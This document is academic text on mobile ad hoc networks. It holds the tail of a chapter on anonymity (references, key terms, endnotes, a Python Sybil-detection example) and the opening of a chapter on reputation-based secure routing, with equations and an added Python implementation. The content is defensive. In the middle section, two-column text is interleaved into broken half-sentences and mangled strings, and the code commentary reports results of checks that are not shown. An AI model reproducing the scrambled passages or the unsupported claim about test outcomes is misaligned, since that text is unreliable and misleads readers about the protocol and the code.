Jiang, S., Vaidya, N. H., & Zhao, W. (2004). A mix route algorithm for mix-net in wireless mobile ad hoc networks. In Proceedings of the 1st IEEE International Conference on Mobile Ad Hoc and Sensor Systems (MASS 2004).

Johnson, D. B., & Maltz, D. A. (1996). Dynamic source routing in ad hoc wireless networks. In Computer Communications Review: Proceedings of the ACM SIGCOMM'96 Conference on Communications Architectures, Protocols and Applications.

Kong, J., Hong, X., Sanadidi, M. Y., & Gerla, M. (2005). Mobility changes anonymity: Mobile ad hoc networks need efficient anonymous routing. In Proceedings of the 10th IEEE Symposium on Computers and Communications (ISCC 2005).

Levine, B. N., Shields, C., & Margolin, N. B. (2006). A survey of solutions to the Sybil attack (Tech. Rep. 2006-052). Amherst, MA: University of Massachusetts Amherst.

Martucci, L. A., Andersson, C., & Fischer-Hübner, S. (2006). Chameleon and the identity-anonymity paradox: Anonymity in mobile ad hoc networks. In Short-Paper Proceedings of the 1st International Workshop on Security (IWSEC 2006) (pp. 123-134).

Martucci, L., Kohlweiss, M., Andersson, C., & Panchenko, A. (2008). Self-certified Sybil-free pseudonyms. In 1st ACM Conference on Wireless Network Security (WiSec 2008).

Perkins, C. E. (2001). Ad hoc networking. Addison-Wesley Professional.

Perkins, C. E., & Royer, E. M. (1999). Ad-hoc on demand distance vector routing. In Proceedings
demand distance vector routing. In Proceedings



of the 2nd IEEE Workshop on Mobile Computing Systems and Applications (WMCSA '99).

Pfitzmann, A., & Hansen, M. (2006). Anonymity, unlinkability, unobservability, pseudonymity, and identity management: A consolidated proposal for terminology v0.27. Retrieved April 25, 2007, from http://dud.inf.tu-dresden.de/literatur/Anon_Terminology_v0.28.doc

Pfitzmann, A., & Waidner, M. (1987). Networks without user observability. Computers and Security, 6(2), 158-166.

Piro, C., Shields, C., & Levine, B. N. (2006). Detecting the Sybil attack in mobile ad hoc networks. In Proceedings of the IEEE/ACM International Conference on Security and Privacy in Communication Networks (SecureComm).

Reiter, M., & Rubin, A. (1997). Crowds: Anonymity for Web transactions (Technical Report No. 97-15). DIMACS (pp. 97-115).

Serjantov, A., & Danezis, G. (2002). Towards an information theoretic metric for anonymity. In Proceedings of the Workshop on Privacy Enhancing Technologies (PET 2002) (LNCS 2482). Springer-Verlag.

Seys, S., & Preneel, B. (2006). ARM: Anonymous routing protocol for mobile ad hoc networks. In Proceedings of the International Workshop on Pervasive Computing and Ad Hoc Communications (PCAC '06).

Shannon, C. E. (1948). A mathematical theory of communication. The Bell System Technical Journal, 27, 379-423.

Song, R., Korba, L., & Yee, G. (2005). AnonDSR: Efficient anonymous dynamic source routing for mobile ad-hoc networks. In Proceedings of the 2005 ACM Workshop on Security of Ad Hoc and Sensor Networks (SASN 2005) (pp. 32-42). Alexandria.

Sweeney, L. (2002). k-Anonymity: A model for protecting privacy. International Journal on Uncertainty, Fuzziness and Knowledge-based Systems, 10(5), 557-570.

Yang, L., Jakobsson, M., & Wetzel, S. (2006). Discount anonymous on demand routing for mobile ad hoc networks. In Proceedings of SecureComm 2006, Baltimore, MD.

Zhang, Y., Liu, W., & Lou, W. (2005). Anonymous communication in mobile ad hoc networks. In Proceedings of the 24th Annual Joint Conference of the IEEE Communication Society (INFOCOM 2005), Miami.

Key Terms

Anonymity: The state of being not identifiable within a set of subjects.

Anonymity Metrics: Metrics for quantifying the degree of anonymity in a scenario.

Mobile Ad Hoc Network: Networks constituted of mobile devices which may function without the help of central infrastructure or services.

Privacy: The right to informational self-determination, that is, individuals must be able to determine for themselves when, how, to what extent, and for what purpose personal information about them is communicated to others.

Receiver Anonymity: Implies that a message cannot be linked to the receiver.

Sender Anonymity: Means that a message cannot be linked to the sender.

Unlinkability: If two items are unlinkable, they are no more or less related after an attacker's observation than they are related concerning the attacker's a-priori knowledge.

Endnotes



1. As devices in ad hoc networks are responsible for their own services, including security and routing, protocols for anonymous communication for wired networks are not suitable for ad hoc networks, not even those based on the peer-to-peer paradigm (P2P) (Andersson et al., 2005).
2. This method is sometimes also called telescope encryption. A public key based version of the method was initially introduced by Chaum (1981). Onion Routing, which only uses public key encryption for setting up the path, and then relies on symmetric encryption, was later proposed by Goldschlag, Reed, and Syverson (1996).
3. The Crowds-based metric was developed for Crowds, but has since been used in other contexts.
4. This denotes the process of setting up a path between the sender and a receiver. First, the sender floods a route request (RREQ) into the network, which triggers the sending of a route reply (RREP) from the receiver to the sender. During the propagation of the RREQ and RREP, respectively, the path is interactively formed.
5. In the context of mobile ad hoc networks, this method is often referred to as a global trapdoor.
6.  In the survey, we omit approaches relying on the existence of either a positioning device (e.g., GPS) in the mobile devices or a location server in the mobile ad hoc network.
7. A global observer is an observer that is capable of observing all network traffic in the whole network.
8. Note that no anonymity is provided against the access points (not included in the attacker model).
9. Batching and reordering traffic to hide the correlation between incoming and outgoing traffic.
10. No sender anonymity if the path length is one.
11. No receiver anonymity against the last mix on the path.
12. It is commonly believed that omnipresent protection against a global observer can only be achieved if all nodes transmit a constant flow of traffic, requiring massive usage of dummy traffic.
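The co-location heuristic of Piro et al. described under "Mechanisms for Detecting the Sybil Attack in Mobile Ad Hoc Networks" above, written out as an added Python example rather than the authors' own code: each observation records an {IP, MAC} pair together with the coarse position cell the observer places it in (an assumption of this example; in practice derived from RSSI or a map grid), and identities that share a cell in nearly every epoch in which either is heard are linked into a suspected Sybil cluster. The observation log, addresses, and thresholds below are constructed for the illustration.

```python
"""Co-location based Sybil detection in the spirit of Piro et al. (2006).
Added illustration, not the authors' code.  Assumptions: the observer can place
each heard {IP, MAC} pair in a coarse position cell per epoch (e.g. derived from
RSSI or a map grid); thresholds below are illustrative."""
from collections import defaultdict
from itertools import combinations

# Constructed log: three honest nodes wander independently; one attacker device
# presents three {IP, MAC} pairs that necessarily move together.
HONEST = {
    ("10.0.0.1", "aa:bb:cc:dd:ee:01"): ["c1", "c1", "c3", "c4", "c2", "c5"],
    ("10.0.0.2", "aa:bb:cc:dd:ee:02"): ["c1", "c1", "c2", "c5", "c3", "c4"],
    ("10.0.0.3", "aa:bb:cc:dd:ee:03"): ["c2", "c4", "c1", "c3", "c5", "c1"],
}
SYBIL_CELLS = ["c2", "c3", "c3", "c1", "c4", "c4"]
SYBIL = {(f"10.0.0.{i}", f"aa:bb:cc:dd:ee:0{i}"): SYBIL_CELLS for i in (7, 8, 9)}


def build_log():
    """Flatten the constructed trajectories into (epoch, cell, ip, mac) records."""
    log = []
    for ident, cells in {**HONEST, **SYBIL}.items():
        for epoch, cell in enumerate(cells, start=1):
            log.append((epoch, cell, *ident))
    return log


def colocation_counts(log):
    """Count, per pair of identities, the epochs in which they shared a cell."""
    in_cell = defaultdict(set)   # (epoch, cell) -> identities heard there
    epochs = defaultdict(set)    # identity -> epochs in which it was heard
    for epoch, cell, ip, mac in log:
        in_cell[(epoch, cell)].add((ip, mac))
        epochs[(ip, mac)].add(epoch)
    together = defaultdict(int)
    for idents in in_cell.values():
        for x, y in combinations(sorted(idents), 2):
            together[(x, y)] += 1
    return together, epochs


def suspected_sybil_clusters(log, min_shared=3, min_ratio=0.8):
    """Link two identities when they were co-located in at least `min_shared`
    epochs and in at least `min_ratio` of the epochs either was observed.
    Connected components of the resulting graph are the suspected Sybil sets."""
    together, epochs = colocation_counts(log)
    adj = defaultdict(set)
    for (x, y), shared in together.items():
        ratio = shared / len(epochs[x] | epochs[y])
        if shared >= min_shared and ratio >= min_ratio:
            adj[x].add(y)
            adj[y].add(x)
    clusters, seen = [], set()
    for start in adj:
        if start in seen:
            continue
        comp, stack = set(), [start]
        while stack:
            v = stack.pop()
            if v not in comp:
                comp.add(v)
                stack.extend(adj[v] - comp)
        seen |= comp
        clusters.append(frozenset(comp))
    return sorted(clusters, key=lambda c: (-len(c), sorted(c)))


if __name__ == "__main__":
    for cluster in suspected_sybil_clusters(build_log()):
        print("suspected Sybil cluster:", sorted(cluster))
```

The two honest nodes that share a cell in the first two epochs fall below `min_shared`, while the three attacker identities are linked in every epoch. The drawback the text notes carries over directly: the output is a set of {IP, MAC} pairs to distrust, not a device, so an attacker who mints fresh pairs starts with a clean record, and two honest devices carried by the same person will also cluster, which is why the thresholds trade false positives against missed Sybils.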




Chapter XXVIII
Secure Routing with
Reputation in MANET
Tomasz Ciszkowski
Warsaw University, Poland

Zbigniew Kotulski
Warsaw University, Poland

AbstrAct

The pervasiveness of wireless communication recently gave mobile ad hoc networks (MANET) significant researchers' attention, due to their innate capabilities of instant communication in many time and mission critical applications. However, their natural advantages of networking in civilian and military environments make them vulnerable to security threats. Support for anonymity in MANET is orthogonal to a critical security challenge we face in this chapter. We propose a new anonymous authentication protocol for mobile ad hoc networks enhanced with a distributed reputation system. The main objective is to provide mechanisms concealing the real identity of communicating nodes while resisting known attacks. The distributed reputation system is incorporated for trust management and malicious behaviour detection in the network.

Introduction

The contemporary information society extensively takes advantage of wireless communication using several specific network technologies. This continuously evolving area provides a flexible and convenient way for improving work standards in business, home, education, or rescue applications. Thanks to the pervasiveness of private unlicensed spectrum technologies such as Bluetooth and IEEE 802.11 family protocols, the communication between personal and handheld electronic devices is easier, more comfortable, and mobile. Over the years, a lot of research effort was devoted to functional and network performance improvements, and the existing standards were designed for fully cooperative environments. However, many first pioneering deployments of wireless networks quickly revealed the several vulnerabilities they suffer from. Since that time substantially more

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Secure Routing with Reputation in MANET

attention has been paid to security as a supplementary service protecting and supporting performance in wireless communication. The specific, unique characteristics of mobile ad hoc networks (MANET), such as multihop routing and a highly dynamic topology, impose a new type of security concerns that we present in this chapter.
In response to the vulnerabilities identified in several MANET protocols, a set of security considerations has been incorporated in a number of extensions to existing nonsecure approaches. Even though strong security requirements are met in many MANET protocol designs, only few of them address anonymity and privacy guarantees (Boukerche, 2004; Ciszkowski & Kotulski, 2006; Kong & Hong, 2003; Zhang, Liu, & Lou, 2005), which are treated as a critical challenge orthogonal to security that we discuss in this chapter. On the example of a novel anonymous authentication protocol (ANAP) for mobile ad hoc networks (Ciszkowski & Kotulski, 2006) we present an enhanced distributed reputation system designed for efficient and secure routing in MANET. The main objective of this work is to provide the protocol with mechanisms concealing the real identity of the communicating nodes while maintaining resistance to known attacks (Chaum, 1981; Pfitzmann & Hansen, 2005). The distributed reputation system is incorporated in order to build and manage mutual trust of the communicating nodes. The trust knowledge reflects trustworthy and malicious activity in the network, effectively improving secure routing in MANET by means of anonymous authentication and path discovery phases. ANAP delivers links for secure exchange of data, taking advantage of an on-demand routing approach (Hu et al., 2002; Perkins & Royer, 1999; Royer & Toh, 1999).
The following sections present related work and protocol designs focusing on the distributed reputation system improving secure and anonymous routing in MANET. The last two sections cover some concluding remarks and further research directions.

Background

A MANET is a set of mobile nodes which operate wirelessly in an environment devoid of fixed network structure, held together by self-configuring and self-organizing mechanisms. All its nodes are free to move, join, or leave the network in an ad hoc manner, while end-to-end communication between nodes beyond each other's radio range is performed in a multihop fashion. This specific feature imposes additional requirements on every node that, apart from sending and receiving data, must act as an interconnecting router. Since every node may be obliged to perform data forwarding, appropriate routing algorithms were developed to meet such a requirement. The main objective of routing protocols for ad hoc networks is creating an up-to-date multihop communication path in a dynamically changing network topology. The specific path discovery and path maintenance algorithms that have been developed characterize particular routing protocols. One can distinguish two groups of protocols designed for MANET: reactive (on-demand) and proactive (table-driven). The first type tries to resolve a path to a destination node on the source node's demand, whereas the second approach is more preventive and continuously keeps routing tables up to date by monitoring the nearest neighbourhood. A detailed description and comparison of both classes of routing protocols for ad hoc networks may be found in the works by Hu et al. (2002), Johnson (1994), and Royer et al. (1999).
At the moment several applications apart from the strict MANET paradigm take advantage of dynamic ad hoc routing and make use of it in wireless environments akin to MANET, such as wireless mesh networks or vehicular ad hoc networks (VANET). This increasing application potential makes MANET security a primary concern for the research community.
For MANETs there are several solutions considering multilayer defence against known attacks, mainly focusing on provided services such as authentication, anonymity, confidentiality, and integrity based on network layer security. Most of them extend existing protocols for which the

0
Secure Routing with Reputation in MANET

scopeofsecurityconsiderationswassignificantly and should assure a self-configurable principle


limited, such as AODV, DSR, DSDV, and LSP of MANET, which is an important and challeng-
(Royer et al., 1999). A complete protection from ing task for the nowadays research (Hu & Perrig,
various attacks in MANET takes into account ac- 2004; Mangipudi, Katti, & Fu, 2006; Yang et al.,
tions such as prevention, detection, and reaction. 2004).
The prevention is usually achieved by means of Even though the many solutions for mobile ad
secure routing protocols (path discovery and main- hoc networks ensure secure communications (Hu
tenance), while the abnormal behaviour detection & Perrig, 2004; Yang et al., 2004), very few of them
is performed by monitoring end-to-end communi- address privacy guaranties as complementary to
cation or by overhearing the local neighbourhood. a strict security approach (Kong, Hong, & Gerla,
In both cases the security extensively employs 2005). The main objective of the anonymous
different cryptographic primitives authenticating communication in mobile ad hoc network is to
routing messages (Hu & Perrig, 2004; Yang, Luo, provide privacy for all of its users represented by
Ye, Lu, & Zhang, 2004). The main difference be- the nodes. Demanding for anonymity imposes a
tween authentication schemes was characterized series of requirements for protocol construction and
in the following list: creates the new types of attacks. A set of formal
notions of the anonymity and its related properties
• First method takes advantage of a single canbefoundbyChaumand ) 1 89 1 ( Pfitzmannand
shared session key widely distributed in the Hansen (2005), where the authors characterize a
group of MANET nodes, for example, used general anonymous system with identity man-
in secure routing protocol (SRP) (Papadimi- agementdesignedforfixednetworktopologybut
tratos & Haas, 2002). This approach does not easily applicable for MANET. ANODR protocol
provide anonymity and is vulnerable to single (Kong & Hong, 2003) delivers a full irrevocable
node compromise. anonymity based on symmetric cryptography
• Second method assumes sharing pair-wise primitives. Note that the pure anonymity of the us-
keys between all nodes in the networks and is ers limits the accountability for malicious activity
used for HMAC in Ariadne (Hu et al., 2002). in the network. In order to avoid such a restriction
It suffers from lack of scalability and in this a revocable anonymity was introduced which is
case of N nodes; N(N-1)/2 keys are required based on pseudonyms managed by trusted third
priory to allow communication. party, as it was proposed in ANAP (Ciszkowski
• Third approach makes use of scalable public & Kotulski, 2006), MASK (Zhang et al., 2005),
key cryptography where digital certificates and SDAR (Boukerche, 2004). Authors of SDAR
and signatures allow the mobile nodes to be identifiedthatanonymousMANETisan - environ
mutually authenticated (Sanzgiri, Dahill, ment suffering from the lack of personal and direct
Levine, Shields, & Belding-Royer, 2002; incentives to be well cooperative between nodes.
Zapata & Asokan, 2002). It is a principle In order to overcome this important vulnerability,
method for secure routing in ARAN, SEAD, SDAR was proposed: a node’s trust management
and SAODV. Although this method is linearly system providing a scoring of node’s local activ-
scalable when a node’s number increases, its ity whereby during the communication the most
exibility
fl and efficiency may suffer from trustful nodes were promoted.
vulnerability to denial-of-service (DoS) at- In the anonymous communication in the mobile
tacks and computation overhead. ad hoc networks the trust management is used for
misbehaviour detection and nodes evaluation. This
All of aforementioned methods assume exis- evaluation creates a long-term node assessment
tence of trusted authority TA (certifying authority called a reputation. A reputation is known from
CA) dealing with a key setup phase. The online e-market mostly thanks to online auctioning sys-
and distributed TA supports key management tems,butintermsofMANET,itwasdefinedby


Secure Routing with Reputation in MANET

Buchegger (2005) as a means of providing incentives for good behaviour of nodes and a metric used for identifying the most trustworthy node. The main purpose of reputation management is the detection of any untrustworthy behaviour in the network that interferes with ordinary and regular functions such as routing (next-hop finding) and forwarding (packet relaying), and, finally, the isolation of the originators of such activity. This goal of reputation management motivates nodes to be cooperative and improves network security and performance.

Blaze, Feigenbaum, and Lacy (1996) argue for enhancing the existing trust management systems that incorporate PGP (Zimmermann, 1994) and the X.509 PKI infrastructure. They propose a flexible and independent security system, PolicyMaker, which deals with policy management. They point out that trust transitiveness usually depends on the context of the service, for example, e-mail, link capacity, and quality of service in data forwarding, while PGP and X.509 support trust transitivity considering only the guarantee of an association between a public key and its owner's identity. One of the first solutions addressing trust transitiveness in MANETs was the CONFIDANT protocol (Buchegger & Le Boudec, 2002), followed by SDAR. CONFIDANT incorporates a reputation system maintaining node trust, path rates, and shared reputation information; however, its construction does not provide anonymous communication. The SDAR protocol supports secure and anonymous communication, but the proposed reputation system is limited in its efficiency because it supports only three levels of permissible trust that a node may obtain.

In the next section we present an introduction to reputation-based secure routing, defining the concepts of trust and reputation in relation to the mechanisms of their modelling and management. In the main part of the following section, we introduce an example of a distributed reputation model implemented in an anonymous authentication protocol for mobile ad hoc networks (Ciszkowski & Kotulski, 2006).

REPUTATION-BASED SECURE ROUTING IN MANET

Among the many secure routing protocols for mobile ad hoc networks (Hu & Perrig, 2004; Yang et al., 2004), only a few proposals consider anonymity as a critical service assuring privacy for MANET users: ANODR, MASK, SDAR, and ANAP. The demand for anonymity in an open environment such as a mobile ad hoc network decreases node accountability and may be a source of unexpected behaviour coming from unknown network identities. It is postulated that by incorporating a distributed reputation system into a secure routing protocol we can detect and avoid cooperation with hostile anonymous nodes. The reputation system is an essential part of routing in MANETs, as it facilitates prediction of node behaviour and improves the performance of anonymous communication. The reputation system provides a set of mechanisms and policies that, when applied locally, similarly to PolicyMaker (Blaze et al., 1996), allow assigning a value of trust to a particular action performed in the network. Such an approach maintains trust knowledge of local neighbourhood activity without revealing real identities. This information acts as a probability of future intentions and behaviours in the network and may be used to steer the path discovery process by choosing a communication path containing only trusted nodes.

Trust and Reputation Modelling

In the literature one can find many interchangeable uses of reputation and trust, even though, in popular understanding, they are not synonyms. In order to avoid any confusion in this chapter we follow the definitions of Hussain, Chang, and Dillon (2004): by trust we mean the subjective probability held by one peer (the trustee) that the particular actions another peer (the trusted) is willing and capable to perform will be done according to the trustee's expectations in the given context and time. Trust so defined is asymmetrical and is usually represented by knowledge gathered during direct interactions and observations. The reputation is a perceived grade of trustworthiness of a particular peer created by its historical behaviour during observations and interactions with third-party peers in the given context and time. This definition describes the concept of a peer's reputation expressed by a level of aggregated trust exchanged and shared between other peers. The main difference between reputation and trust is that subjective trust is usually created by direct, own experience, while reputation is established by combining the trust knowledge of others. Considering the stated explanation, reputation tends to represent a generalized opinion in a local group of peers. As reputation may comprise the aggregated trust of several network nodes, it becomes a very valuable metric that supports the routing process. The measure expressing the level of trustworthiness of a particular node is also an important incentive for cooperation and good behaviour in the anonymous ad hoc network.

In terms of trust aggregation, sharing, and assessment, we can distinguish several types of modelling and management of reputation in collaborative environments such as P2P networks, auctioning systems, and, in particular, MANETs. One of the leading modelling concepts for distributed reputation assumes a probabilistic representation of trust and introduces the importance or uncertainty of shared knowledge. Lee, Hwang, Lee, and Kim (2006) apply fuzzy set theory to trust modelling. This approach defines multiple evaluation criteria with different importance factors. It allows building trust by classifying the different types of observations and aggregating them with different importance weights. Since every criterion is strictly related to a class of observations, the interpretation of shared reputation depends on one's own preferences. Jøsang (2002) introduces subjective logic, where trust is represented by a probability vector named an opinion, which is composed of belief, disbelief, uncertainty, and an atomicity function. The atomicity function additionally determines the rate of uncertainty in the expected value of trust. Based on this approach, Huang, Hu, and Wang (2006) propose a system similar to Lee et al.'s (2006) weighted trust evaluation, but the weights are dynamically modified by a feedback control unit according to the trust-policing module. The related probabilistic trust management methods are very attractive, but they usually suffer from the complexity of the probabilistic logic incorporated into the calculations.

Very interesting, and especially suitable as a MANET trust model, is the enhanced reputation model for mobile ad hoc networks proposed by Liu and Issarny (2004). It takes advantage of the monitoring system as the principal module of misbehaviour detection (Buchegger & Le Boudec, 2002), which was effectively improved by exchanging second-hand information (Buchegger, 2005). This work considers nodes' own experience, time, and context dependency, and introduces the definitions of service and recommendation reputation. In SDAR for anonymous MANETs a three-level community trust management was introduced, in which every node may act as the central node of a community consisting of its nearest one-hop neighbours. The reputation is created locally, based on detected packet drops and modifications. In the network one distinguishes three classes of trust, which are assigned to every node. Trustworthy behaviour usually promotes nodes to a higher trust level, but ultimately it may depend on local policies. The route discovery process is conducted considering a node's class membership. The main drawbacks of this approach are the low granularity of the trust classes and the consideration of only local, own experience.

Distributed Reputation for Secure MANET

In this section we present a distributed reputation system which extends the Liu and Issarny (2004) reputation model incorporated in ANAP (Ciszkowski & Kotulski, 2006). We propose a new method of evaluating recommendation reputation considering past experience and the recommendation reputation of voters (recommenders). We define two types of second-hand information, related to the immediate nodes and the cumulative reputation describing the aggregated reputation of the immediate nodes' neighbourhood. Second-hand information is exchanged on demand of the interested nodes. In order to detect malicious activity and any anomalies in
information exchange we incorporate a second-hand recommendation validation by a statistical correlation approach.

The reputation depends on time, own past experience, and second-hand information, and is expressed by a level of trust. These input features are organized in a dynamic reputation evaluation scheme providing a node assessment. The proposed model consists of the following definitions and assumptions:

• SR_n^B(A) – service reputation held by B, expressing the level of trust in node A at time n; it is taken into account whenever B is going to interact with A.
• IR_n^B(C) – information reputation held by B, expressing the level of trust in second-hand information V_n^{BC} received from node C at time n; it is used for evaluating the second-hand information received from C.
• V_n^{BC}(A) – second-hand information (vote) coming from C to B; it contains a recommendation of trust in node A and, for an honest node C, equals SR_n^C(A).
• CR_n^B(A) – cumulative reputation expressing an aggregated grade for A's neighbourhood, which is unreachable by B at time n; it acts as the reputation of the path going from B through node A.
• PR_n^B(A) – path reputation, the product of service and cumulative reputation, expressing the trust of a path going from node B through node A at time n.
• STE^B(A) – satisfaction degree of node B during an elementary interaction with node A.
• ST_n^B(A) – average satisfaction degree of node B during several elementary interactions with node A at time n.
• OE_n^B(A) – own experience of node B based on the history of interactions with node A.
• Nodes exchange V information with truthful neighbours.
• All of the aforementioned parameters vary in the range <-1, 1>, where the most positive value reflects the most trustworthy parameter.

The building process of the key reputation metrics is illustrated in Figure 1.

Figure 1. Model of distributed reputation system providing the following vector metrics: own experience OE^B(A), votes V^B(A), service reputation SR^B(A), cumulative reputation CR^B(A) and path reputation PR^B(A)

We introduced a virtual discrete time n in order to make the event-based nature of building reputation independent of real time. The virtual time depends on the number of events, and its quantum consists of a constant number Q of elementary interactions STE_i. Every STE_i is expressed by Equation (1) and depends on a set of weighted metrics m monitored by a node during network packet exchange. The metrics vector corresponds to all kinds of detectable observations, such as every overheard packet modification, attacks (DoS, replay attack, etc.), and network quality of service (QoS) parameters, for example transmission delay and packet drops. This set of direct measurements is evaluated by the expectation function E, which allows assigning a different importance factor to each particular type of its arguments. The STE_i building process should take into account all the observable misbehaviour defined at the end of this section.

STE_i^B(A) = \sum_{j=0}^{L-1} w_j E_i(m_j)    (1)

After every Q interactions between B and A, the time value n is incremented and the aggregated STE_i update the satisfaction degree ST:

ST_n^B(A) = \frac{1}{Q} \sum_{i=0}^{Q-1} STE_i^B(A)    (2)

The proposed model takes advantage of past experience with an L-length finite memory, where every reputation measure of time n - L becomes the oldest value and is forgotten.

The own experience of node B at time n is based on the history of interactions with node A and is evaluated as a weighted average of ST:

OE_n^B(A) = \frac{\sum_{j=0}^{L-1} \gamma_j ST_{n-j}^B(A)}{\sum_{j=0}^{L-1} \gamma_j}, \qquad \gamma_n = \begin{cases} \rho, & n = 0 \\ (1-\rho)^{n+1}, & n > 0 \end{cases}    (3)

where γ_n is an exponential fading function depending on time and 0 < ρ < 1.

Whenever the own experience (OE) is updated or second-hand information V is obtained, the service reputation (SR) is modified. SR consists of own experience and a weighted average of votes taking into account the information reputation (IR) of the recommending nodes. Considering the set G_V of nodes voting on A, node B takes into account only nodes with positive IR. Own information is usually more valuable (Kong et al., 2005; Buchegger, 2005), hence a scaling factor α ∈ <0, 1> is introduced into the formula:

SR_n^B(A) = \alpha\, OE_n^B(A) + (1-\alpha) \frac{\sum_{p \in G_V \setminus \{B\}} IR_n^B(p)\, V_n^{Bp}(A)}{\sum_{p \in G_V \setminus \{B\}} IR_n^B(p)}, \quad IR_n^B(p) > 0    (4)

Note that nodes that cooperate rarely have a small service reputation SR and are less trustworthy.

In order to evaluate the credibility of a recommendation V obtained from neighbouring nodes, it is required to update the information reputation (IR). In our model we propose a formula which considers the close relation between a node's own experience (OE) with a particular node, say A, and the other voters' IR:

IR_n^B(C) = \beta\, OE_n^B(C) - \frac{\sum_{p \in G_V \setminus \{B\}} IR_n^B(p)\, |V_n^{Bp}(C) - OE_n^B(C)|}{2 \sum_{p \in G_V \setminus \{B\}} IR_n^B(p)}, \quad IR_n^B(p) > 0    (5)

where β ∈ <0, 1> is a scaling factor for own experience. It is recommended to let the service reputation (SR) evolve more dynamically than the information reputation (IR), which is equivalent to β < α. This allows nodes to rehabilitate their service reputation faster than their recommendation credibility. It means that nodes providing only good service are able to rebuild an already lost information reputation.

Revealing all node identities on the communication path would provide an easy way of building a global node reputation and evaluating reputation along the path from the source to the destination. However, in ANAP, for a communication path longer than three hops the physical identity of the nodes remains purely anonymous. Therefore we evaluate a cumulative reputation (CR) for the intermediate node as the aggregated trust of its neighbour nodes, which are unreachable by the source node. This metric reflects the reputation along a path and does not break the anonymity; it is given by Equation (6).
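The following Python module is an added example, not code from the chapter or from ANAP, that implements the reputation metrics defined above (Equations 1 through 5) together with the cumulative and path reputation of Equations 6 and 7 that follow. It evaluates everything from the point of view of one node B. The memory length L, the quantum Q, the fading parameter ρ, the scaling factors α and β, the choice of the identity for the expectation function E, the neutral fallbacks used when no voter has positive IR, the literal denominator of Equation 6, and every number in the checks below are assumptions chosen for illustration.

```python
"""Distributed reputation metrics of the chapter's model (Equations 1-7), evaluated at node B.

Added example; parameter values, the identity choice for E, and the fallbacks used when no
credible voter exists are assumptions, not part of the chapter or of ANAP.
"""
from typing import Dict, List, Sequence, Set, Tuple

L = 4        # finite memory length in virtual time steps (assumption)
Q = 3        # elementary interactions per virtual time quantum (assumption)
RHO = 0.6    # fading parameter, 0 < rho < 1 (assumption)
ALPHA = 0.7  # weight of own experience in SR, Eq. 4 (assumption)
BETA = 0.5   # weight of own experience in IR, Eq. 5; beta < alpha as the chapter recommends


def ste(metrics: Sequence[float], weights: Sequence[float]) -> float:
    """Eq. 1: STE = sum_j w_j * E(m_j). E is the identity on metrics already normalised to
    <-1, 1> (assumption); weights summing to 1 keep STE inside <-1, 1> as well."""
    if len(metrics) != len(weights):
        raise ValueError("one weight per metric")
    return sum(w * m for w, m in zip(weights, metrics))


def st(stes: Sequence[float]) -> float:
    """Eq. 2: average satisfaction over the Q elementary interactions of one quantum."""
    if len(stes) != Q:
        raise ValueError("a quantum holds exactly Q elementary interactions")
    return sum(stes) / Q


def gamma(j: int) -> float:
    """Fading coefficient as printed in Eq. 3: rho for j = 0, (1 - rho)^(j+1) for j > 0."""
    return RHO if j == 0 else (1.0 - RHO) ** (j + 1)


def own_experience(st_history: Sequence[float]) -> float:
    """Eq. 3: weighted average of the last L satisfaction degrees. st_history is oldest first,
    so after reversing the window index j refers to ST_{n-j}."""
    window = list(st_history)[-L:][::-1]
    if not window:
        return 0.0  # no interaction yet: neutral (assumption)
    return sum(gamma(j) * s for j, s in enumerate(window)) / sum(gamma(j) for j in range(len(window)))


def _credible(votes: Dict[str, float], ir: Dict[str, float]) -> Dict[str, float]:
    """Keep only votes from recommenders whose information reputation is positive (IR_n(p) > 0)."""
    return {p: v for p, v in votes.items() if ir.get(p, 0.0) > 0.0}


def service_reputation(oe_a: float, votes_on_a: Dict[str, float], ir: Dict[str, float]) -> float:
    """Eq. 4: SR = alpha*OE + (1 - alpha) * IR-weighted mean of the credible votes about A."""
    trusted = _credible(votes_on_a, ir)
    if not trusted:
        return oe_a  # no credible second-hand information: rely on own experience (assumption)
    weighted = sum(ir[p] * v for p, v in trusted.items()) / sum(ir[p] for p in trusted)
    return ALPHA * oe_a + (1.0 - ALPHA) * weighted


def information_reputation(oe_c: float, votes_on_c: Dict[str, float], ir: Dict[str, float]) -> float:
    """Eq. 5: IR(C) = beta*OE(C) - (IR-weighted mean of |V(C) - OE(C)|) / 2; the division by 2
    maps the distance between two values in <-1, 1> back onto <0, 1>."""
    trusted = _credible(votes_on_c, ir)
    if not trusted:
        return BETA * oe_c  # nothing to compare against: the penalty term vanishes (assumption)
    penalty = sum(ir[p] * abs(v - oe_c) for p, v in trusted.items()) / sum(ir[p] for p in trusted)
    return BETA * oe_c - penalty / 2.0


def cumulative_reputation(votes_on_a: Dict[str, float], ir: Dict[str, float],
                          nbrs_a: Set[str], nbrs_b: Set[str]) -> float:
    """Eq. 6: credible votes on A from A's neighbours that B cannot reach, divided (as printed)
    by the size of that whole far side, so missing or non-credible votes pull CR toward zero."""
    far_side = nbrs_a - nbrs_b
    if not far_side:
        return 0.0  # nothing known about A's far side: neutral (assumption)
    credible = _credible({p: votes_on_a[p] for p in far_side if p in votes_on_a}, ir)
    return sum(credible.values()) / len(far_side)


def path_reputation(sr: float, cr: float) -> float:
    """Eq. 7: PR = SR * CR."""
    return sr * cr


def rank_next_hops(candidates: Dict[str, Tuple[float, float]]) -> List[str]:
    """Order candidate next hops (hop -> (SR, CR)) by PR, highest first; a hop whose PR falls
    below zero is closed and left out, as the chapter prescribes for the channel."""
    scored = {hop: path_reputation(sr, cr) for hop, (sr, cr) in candidates.items()}
    return sorted((h for h, pr in scored.items() if pr >= 0.0), key=lambda h: -scored[h])
```

With the constructed values used in the checks, B's service reputation for A combines its own experience 0.5 with the votes of C and D (E is ignored because its IR is negative), the far side of A contributes a cumulative reputation of 0.6, and a candidate hop whose CR is negative is closed even though its SR is high.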


CR_n^B(A) = \frac{\sum_{p \in G_V^A \setminus G_V^B} V_n^{Bp}(A)}{|G_V^A \setminus G_V^B|}, \quad IR_n^B(p) > 0    (6)

where G_V^B and G_V^A are the sets of nodes in the neighbourhood of node B and node A, respectively. Every time a source node wants to send data to an immediate node it calculates a path reputation (PR) as the product of the service reputation, combining own and immediate nodes' experience, and the cumulative reputation:

PR_n^B(A) = SR_n^B(A)\, CR_n^B(A)    (7)

The set of paths with the highest PR is selected for communication. For a path whose PR falls below zero, the communication channel should be closed.

